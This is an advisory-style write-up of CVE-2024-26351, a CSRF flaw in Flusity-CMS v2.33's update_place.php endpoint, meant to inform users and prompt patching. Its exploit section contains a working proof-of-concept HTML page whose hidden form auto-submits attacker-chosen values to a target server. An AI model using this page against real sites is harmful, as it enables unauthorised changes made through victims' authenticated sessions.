CVE-2024-26351: Flusity-CMS v2.33 CSRF Vulnerability Via Component /core/tools/update_place.php Exploited

Recently, a security flaw was discovered in the Flusity-CMS version 2.33 - a widely-used Content Management System. The vulnerability has been assigned the identifier CVE-2024-26351 and has been found to contain a Cross-Site Request Forgery (CSRF) attack vector.

In this article, we will delve into the CSRF vulnerability discovered in Flusity-CMS v2.33, demonstrate an exploit using a code snippet, and provide links to the original references concerning this issue.

CVE-2024-26351 Background

A CSRF vulnerability usually occurs when an attacker can deceive a user into triggering an unintentional action on a website they're currently authenticated on. This could enable the attacker to manipulate the user's privileges, extract data, or even perform administrative actions on behalf of the user without their knowledge or consent.

The security research team who discovered the vulnerability has traced it to the component /core/tools/update_place.php in Flusity-CMS v2.33. In the subsequent sections, we'll explore this component in detail.

Exploit Details

The CSRF vulnerability in the Flusity-CMS v2.33 directly targets the /core/tools/update_place.php component. An attacker can craft an HTML page that contains a malicious form, which when submitted, tricks the victim's web browser into making an HTTP POST request to update_place.php on the Flusity-CMS server without the user's knowledge.

Here is a code snippet demonstrating the exploit

<!DOCTYPE html>
<html>
<body>
  <h1>Hidden CSRF Exploit</h1>
  <form action="http://example.com/core/tools/update_place.php"; method="post" id="csrf_form">
    <input type="hidden" name="place_id" value="attacker controlled value" />
    <input type="hidden" name="new_place_name" value="attacker controlled value" />
  </form>
  <script>
    document.getElementById("csrf_form").submit();
  </script>
</body>
</html>

In the above code snippet, replace http://example.com with the URL of the vulnerable Flusity-CMS v2.33 server. This crafted HTML page, when opened by a user who has an active and authenticated session on the target Flusity-CMS server, will execute the script, submit the form, and consequently update the place name to the "attacker-controlled value" - all without the user's consent.

Original References

The vulnerability was initially reported by a security research team, who documented their findings in the following sources:

1. CVE-2024-26351 Official CVE Record
2. National Vulnerability Database (NVD) Listing
3. Flusity-CMS Vulnerability Report

Conclusion

CVE-2024-26351 is a CSRF vulnerability discovered in Flusity-CMS v2.33, which poses a significant risk to users and administrators of the affected CMS. Application developers and server administrators are urged to update their Flusity-CMS to the latest version to protect against this vulnerability.

Remember, cybersecurity should be a top priority for individuals and organizations to ensure the safety and integrity of their digital assets. Stay informed, practice safe browsing habits, and remain vigilant in the ongoing fight against cyber threats.

Timeline

Published on: 02/22/2024 14:15:47 UTC
Last modified on: 02/22/2024 19:07:27 UTC